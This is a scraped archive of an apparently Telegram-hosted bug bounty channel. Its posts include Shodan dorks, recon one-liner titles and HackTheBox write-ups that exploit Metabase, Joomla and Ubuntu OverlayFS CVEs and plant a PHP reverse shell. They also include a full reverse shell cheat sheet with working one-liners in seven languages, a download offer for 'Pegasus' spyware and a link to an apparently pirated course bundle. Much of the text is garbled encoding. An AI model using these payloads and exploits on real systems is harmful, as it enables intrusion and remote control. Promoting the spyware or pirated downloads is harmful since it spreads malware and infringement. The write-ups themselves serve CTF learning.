Bug bounty Tips
Kanalga Telegramโda oโtish
๐ก๏ธ Cybersecurity enthusiast | ๐ป Helping secure the digital world | ๐ Web App Tester | ๐ต๏ธโโ๏ธ OSINT Specialist Admin: @laazy_hack3r
Ko'proq ko'rsatish5 849
Obunachilar
+1124 soatlar
+687 kunlar
+37430 kunlar
Postlar arxiv
5 851
โขย Amass
โขย Amass + Nuclei: Finding domain
โขย Amass + Nuclei 2: Finding domain
โขย Finding subdomains with jsubfinder + httpx
โขย Using FFUF to finding RCE
โขย Full Account Takeover Technique in API/Register
โขย Oneliner Search JS domain using subjs, anew and httpx
โขย Shodan queries to search Scada, IoT, Router Devices
โขย Screnshoot page using aquatone using domain files
โขย oneliner using shodan and nuclei to scanning hosts
โขย Oneliner finding subdomain using gospider ,
assetfinder , amass and nuclei
โขย Oneliner portscan and subdomain discovery
using subfinder , cf-check, naabu and httprobe
โขย Oneliner search SSRF using subfinder , httpx
and qsreplace
โขย Oneliner recon domain and subdomains using
chaos, gospider , findomain, assetfinder , amass,
httpx and anew
โขย Oneliner search xss using kxss, xargs and
httpx
โขย Google dork to discovery api exposure
โขย Create script to finder and test sql injection
โขย Oneliner find xss using subfinder , httpx,
katana, gxss, kxss and dalfox
โขย Domain enumeration and discovery files
using ffuf, httpx and findomain
โขย oneliner find open redirect using waybackurls,
httpx, gf, anew and nuclei
โขย Oneliner complete enumeration xss, lfi, ssrf in
domain using gauplus, anew, gxss, gf, qsreplace,
httpx and SecretFinder
โขย Oneliner check cloudflare using subfinder ,
dnsx, cf-check, naabu
โขย Oneliner recon jira using uncover with shodan,
censys and fofa and vulnerability scan with nuclei
โขย Oneliner recon subdomain using assetfinder ,
httpx, xargs, waybackurls and nuclei vulnerability
scan
โขย Oneliner extract js using haktrails, httpx, getjs,
anew, tojson
โขย Oneliner LFI using gau, gf, qsreplace and xargs
5 851
๐ฐ ๐ช๐๐ฉ๐ฌ๐น ๐บ๐ฌ๐ช๐ผ๐น๐ฐ๐ป๐ ๐ช๐ถ๐ณ๐ณ๐ฌ๐ช๐ป๐ฐ๐ถ๐ต ๐ฐ
๐ช๐๐๐๐๐๐๐๐๐ ๐ณ๐๐๐:
โ๐๐ฎ๐ ๐๐จ๐ฎ๐ง๐ญ๐ฒ ๐๐ง๐๐ซ๐จ๐ข๐ ๐๐๐๐ค๐ข๐ง๐
โ๐๐ฎ๐ ๐๐จ๐ฎ๐ง๐ญ๐ฒ ๐๐ฎ๐ง๐ญ๐ข๐ง๐ ๐๐ฎ๐ข๐๐ ๐ญ๐จ ๐๐ง ๐๐๐ฏ๐๐ง๐๐๐ ๐๐๐ซ๐ง๐ข๐ง๐ ๐๐๐ญ๐ก๐จ๐
โ๐๐ฎ๐ ๐๐จ๐ฎ๐ง๐ญ๐ฒ ๐๐ฎ๐ง๐ญ๐ข๐ง๐ ๐๐๐๐๐ง๐ฌ๐ข๐ฏ๐ ๐๐ฉ๐ฉ๐ซ๐จ๐๐๐ก ๐ญ๐จ ๐๐ฎ๐ง๐ญ ๐๐ฎ๐ ๐ฌ
โ๐๐ฎ๐ ๐๐จ๐ฎ๐ง๐ญ๐ฒ ๐๐๐ ๐๐๐๐ค๐ข๐ง๐
โ๐๐๐๐๐ ๐๐ฎ๐ฅ๐ฅ ๐๐จ๐ฎ๐ซ๐ฌ๐ ๐๐๐๐
โ๐๐๐ง๐๐ฌ ๐จ๐ง ๐๐๐ง๐๐ญ๐ซ๐๐ญ๐ข๐จ๐ง ๐๐๐ฌ๐ญ๐ข๐ง๐ ๐๐๐๐ฌ
โ๐๐๐๐ซ๐ง ๐๐ซ๐๐๐ค๐ข๐ง๐ ๐๐-๐
๐ ๐ฉ๐๐ฌ๐ฌ๐ฐ๐จ๐ซ๐๐ฌ ๐ค๐๐ฒ๐ฌ ๐๐๐, ๐๐๐ ๐๐๐๐
โ๐๐๐๐ซ๐ง ๐๐ฒ๐ญ๐ก๐จ๐ง & ๐๐ญ๐ก๐ข๐๐๐ฅ ๐๐๐๐ค๐ข๐ง๐ ๐๐ซ๐จ๐ฆ ๐๐๐ซ๐๐ญ๐๐ก
โ๐๐๐ฌ๐ญ๐๐ซ๐ฌ ๐ข๐ง ๐๐ญ๐ก๐ข๐๐๐ฅ ๐๐๐๐ค๐ข๐ง๐ ๐ฐ๐ข๐ญ๐ก ๐๐ง๐๐ซ๐จ๐ข๐
โ๐๐ซ๐๐๐ญ๐ข๐๐๐ฅ ๐๐ฎ๐ ๐๐จ๐ฎ๐ง๐ญ๐ฒ
โ๐๐ซ๐๐๐ญ๐ข๐๐๐ฅ ๐๐ญ๐ก๐ข๐๐๐ฅ ๐๐๐๐ค๐ข๐ง๐
โ๐๐๐๐๐๐๐ฆ ๐๐ฅ๐ฎ๐๐ฉ๐ซ๐ข๐ง๐ญ โ ๐ ๐ฎ๐ง๐ข๐ช๐ฎ๐ ๐ ๐ฎ๐ข๐๐ ๐ญ๐จ ๐๐ญ๐ก๐ข๐๐๐ฅ ๐๐๐๐ค๐ข๐ง๐
โ๐๐ฉ๐ฅ๐ฎ๐ง๐ค ๐๐๐ง๐๐ฌ ๐จ๐ง ๐ญ๐ก๐ ๐๐จ๐ฆ๐ฉ๐ฅ๐๐ญ๐ ๐๐๐ญ๐ ๐๐ง๐๐ฅ๐ฒ๐ญ๐ข๐๐ฌ
โ๐๐ก๐ ๐๐จ๐ฆ๐ฉ๐ฅ๐๐ญ๐ ๐๐ญ๐ก๐ข๐๐๐ฅ ๐๐๐๐ค๐ข๐ง๐ ๐๐จ๐ฎ๐ซ๐ฌ๐
โ๐๐ก๐ ๐๐จ๐ฆ๐ฉ๐ฅ๐๐ญ๐ ๐๐๐๐ค๐ข๐ง๐ ๐๐จ๐ฎ๐ซ๐ฌ๐, ๐๐ฒ ๐๐๐ซ๐ซ๐ข ๐๐๐ง๐๐ข๐๐ฅ๐
โ๐๐ก๐ ๐๐จ๐ฆ๐ฉ๐ฅ๐๐ญ๐ ๐๐๐ฆ๐ฉ ๐๐จ-๐๐จ๐ง๐ฌ๐๐ง๐ฌ๐ ๐๐จ๐ฎ๐ซ๐ฌ๐
โ๐๐ข-๐
๐ข ๐๐ญ๐ก๐ข๐๐๐ฅ๐๐๐๐ค๐ข๐ง๐ ๐ฐ๐ข๐ญ๐ก ๐๐๐ข๐ฅ
โ๐๐ข๐ง๐๐จ๐ฐ๐ฌ ๐๐ซ๐ข๐ฏ๐ข๐ฅ๐๐ ๐ ๐๐ฌ๐๐๐ฅ๐๐ญ๐ข๐จ๐ง ๐๐จ๐ซ ๐๐๐ ๐ข๐ง๐๐๐ซ๐ฌ
โ๐๐ข๐ง๐๐จ๐ฐ๐ฌ ๐๐ซ๐ข๐ฏ๐ข๐ฅ๐๐ ๐ ๐๐ฌ๐๐๐ฅ๐๐ญ๐ข๐จ๐ง ๐๐จ๐ซ ๐๐๐๐ & ๐๐๐ฒ๐จ๐ง๐!
๐Size: 103.7GB+
โฌโฌโฌโฌโฌโฌโฌโฌโฌโฌโฌโฌโฌโฌ
๐ GDrive Link : https://drive.google.com/drive/folders/183SSU6GShal0mzAckd6m9kk0eF2KpcEV?usp=sharing
https://t.me/bugbounty_tech
โฌโฌโฌโฌโฌโฌโฌโฌโฌโฌโฌโฌโฌโฌ
5 851
Repost from Cyber Detective
Interesting way to use LEGBA (https://github.com/evilsocket/legba) #bruteforce tool from twitter.com/evilsocket - enumeration valid emails for G Suite domain.
Read more about LEGBA:
https://www.evilsocket.net/2023/11/02/Enumerate-Bruteforce-Attack-All-The-Things-Presenting-Legba/
5 851
Some Shodan Dorks that might useful in Bug Bounty.
1. org:"http://target. com"
2. http.status:"<status_code>"
3. product:"<Product_Name>"
4. port:<Port_Number> โService_Messageโ
5. port:<Port_Number> โService_Nameโ
6. http.component:"<Component_Name>"
7. http.component_category:"<Component_Category>
8. http.waf:"<firewall_name>"
9. http.html:"<Name>"
10. http.title:"<Title_Name>"
11. ssl.alpn:"<Protocol>"
12. http.favicon.hash:"<Favicon_Hash>"
13. net:"<Net_Range>" (for e.g. 104.16.100.52/32)
14. http://ssl.cert.subject.cn:"<http://Domain .com>"
15. asn:"<ASnumber>"
16. hostname:"<hosthame>"
17. ip:"<IP_Address>"
18. all:"<Keyword>"
19. โSet-Cookie: phpMyAdminโ
20. โSet-Cookie: lang="
21. โSet-Cookie: PHPSESSID"
22. โSet-Cookie: webvpnโ
23. โSet-Cookie:webvpnlogin=1"
24. โSet-Cookie:webvpnLang=enโ
25. โSet-Cookie: mongo-express="
26. โSet-Cookie: user_id="
27. โSet-Cookie: phpMyAdmin="
28. โSet-Cookie: _gitlab_sessionโ
29. โX-elastic-product: Elasticsearchโ
30. โx-drupal-cacheโ
31. โaccess-control-allow-originโ
32. โWWW-Authenticateโ
33. โX-Magento-Cache-Debugโ
34. โkbn-name: kibanaโ
5 851
Pegasus Full
Pegasus is a spyware developed by the Israeli cyber-arms company NSO Group that is designed to be covertly and remotely installed on mobile phones running iOS and Android.
Download Link:- CyberSleuthPacks/Pegasus
NOTE:-Please do not run it on your native windows
5 851
๐ A gentleman's set for a beginner of 4 books on hacking.
1. Hacking like a porn star.
โWhen we sympathize with suffering, we act like all people; making them easier, like God.โ
Horace Mann
2. Hacking with the skill of God.
โLuck is when preparation meets opportunity.โ
Seneca
3. Investigate cybercrimes like a rock star.
โWhen I'm standing at the starting gate, it's just me and the slope.โ
Mikaela Shiffrin
4. Hacking like a legend.
โI am a blank slate, and therefore I can create whatever I want.โ
Tobey Maguire
โบ Read books
#book //โ cyber in network security
5 851
Reverse Shell Cheat Sheet
Bash;
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Python;
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PERL;
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP;
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby;
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat;
nc -e /bin/sh 10.0.0.1 1234
Java;
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm;
xterm -display 10.0.0.1:1
5 851
Journey through Analytical CTF: Unveiling Vulnerabilities and Escalating Privileges
Recently, I had the exhilarating experience of delving into the Analytical CTF, where every step seemed like a puzzle waiting to be solved. Here's a detailed account of my journey:
Discovering the Target
Upon initiating the challenge, I quickly identified the target IP as 10.10.11.233 and added it to my /etc/hosts file for easy access.
Unveiling Metabase Vulnerability
My exploration began with a visit to analytical.htb, revealing a login page under data.analytical.htb. A swift investigation led me to discover a potential Remote Code Execution (RCE) vulnerability within Metabase, marked as CVE-2023-38646. After scouring through resources, I stumbled upon the proof of concept (POC) on GitHub:
git clone https://github.com/securezeron/CVE-2023-38646
To exploit this vulnerability, I executed the following commands:
python3 exploit.py --rhost http://data.analytical.htb --lhost <ip> --port <4444>
nc -lnvp 4444
These commands provided crucial insights into the system, revealing "/proc/self/environ" and uncovering login credentials:
META_USER=meta********
META_PASS=An4l**************8
Gaining Initial Access
With the obtained credentials, I swiftly gained SSH access:
ssh metalytics@analytical.htb
This breakthrough enabled me to acquire the user flag:
user.txt : 9d1f6be*************************
Privilege Escalation Endeavors
Eager to escalate privileges, I probed for sudo permissions but to no avail. Nevertheless, I gleaned system information using commands such as id, uid, and uname -a, revealing the system's configuration:
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
Further exploration led me to uncover vulnerabilities, notably the "CVE-2023-2640 and CVE-2023-32629," also known as GameOver(lay). Referencing available POCs, I crafted an exploit script:
wget https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/blob/main/exploit.sh
The script, designed to exploit Ubuntu privilege escalation vulnerabilities, facilitated my journey towards root privileges:
bash exploit.sh
Root Access Achieved
Executing the exploit script proved fruitful, granting me root access to the system:
root.txt : 9b30872bc********************
With this, I concluded my expedition through the Analytical CTF, armed with newfound knowledge and triumphs. The journey underscored the importance of meticulous exploration and resourcefulness in navigating complex cybersecurity challenges.5 851
Hey, guys i am looking for a good trainer, from bangalore, If anyone here intrested or anyone you know from bangalore, do let me know. ๐
5 851
Target IP: 10.10.11.2*
Upon initiating the reconnaissance phase with Nmap, I unearthed several open ports:
- Port 22 (SSH)
- Port 80 (HTTP)
- Port 2170 (eyetv)
Proceeding with a meticulous Gobuster scan, I uncovered a few directories such as
/images, /css, and /js, all of which returned a discouraging 403 Forbidden error.
Undeterred, I decided to explore the DNS, where I stumbled upon a promising subdomain, dev, which I promptly added to my /etc/hosts file for further investigation.
Next, I randomly got the idea to check robots.txt file and struck gold
โa directory named administrator, suggesting that the site was running Joomla. Furthermore, my interest piqued upon discovering a recently disclosed CVE: 2023-23752.
I quickly checked GitHub and stumbled upon a finding an exploit at [Acceis/exploit-CVE-2023-23752](https://github.com/Acceis/exploit-CVE-2023-23752?tab=readme-ov-file). Executing the exploit with Ruby, I targeted the vulnerable URL and successfully obtained login credentials:
- Username: le***
- DB Password: P4nth*************##
With the acquired credentials, I gained administrative access to the system. Navigating to System > Administrator Templates > index.php, I leveraged a bash script to establish a reverse shell:
# exec("/bin/bash -c 'bash -i >& /tcp/dev 10.10.14.*/4433 0>&1'")
Subsequently, I listened on port 4433 with Netcat and stabilized the shell using Python's pty:
stty raw -echo; fg
Aware that MySQL was operational, I accessed it with:
mysql -u lew** -p
Inside the Joomla database, I explored the sd4fg_user table, revealing encrypted passwords for both 'lewis' and 'logan'.
Having cracked 'logan's password using John the Ripperโ teq********** I successfully logged in via SSH.
Voilร ! I secured the user.txt: d6a93fb199df********************
### Privilege Escalation:
Upon inspecting commands running under 'logan', I singled out /usr/bin/apport-cli. Upon executing sudo /usr/bin/apport-cli -f, a menu prompted me to choose options 1, 2, or V for viewing the report.
Inspecting the environment variables, I noticed:
== ProcEnviron =================================
LANG=en_US.UTF-8
TERM=xterm-256color
PATH=(custom, no user)
SHELL=/bin/bash
Lastly, a tantalizing '!' prompted me to execute it, granting me root access.
Eureka! I triumphantly retrieved the root.txt: 85518faf01***************
With that, I successfully navigated through the intricate maze of challenges, honing my cybersecurity skills along the way. Until the next CTF adventure, stay curious and keep exploring!5 851
CTF Walkthrough: DEvvortex - Gaining Root Access
Recently, I had the opportunity to delve into a captivating Capture The Flag (CTF) challenge where I encountered a series of intriguing hurdles. Let me walk you through the steps I took to conquer this challenge.
5 851
Ready to level up your Bug Bounty game? Read through to discover the top 5 mistakes to avoid! ๐ก๏ธ๐ป
Endi mavjud! Telegram Tadqiqoti 2025 โ yilning asosiy insaytlari 
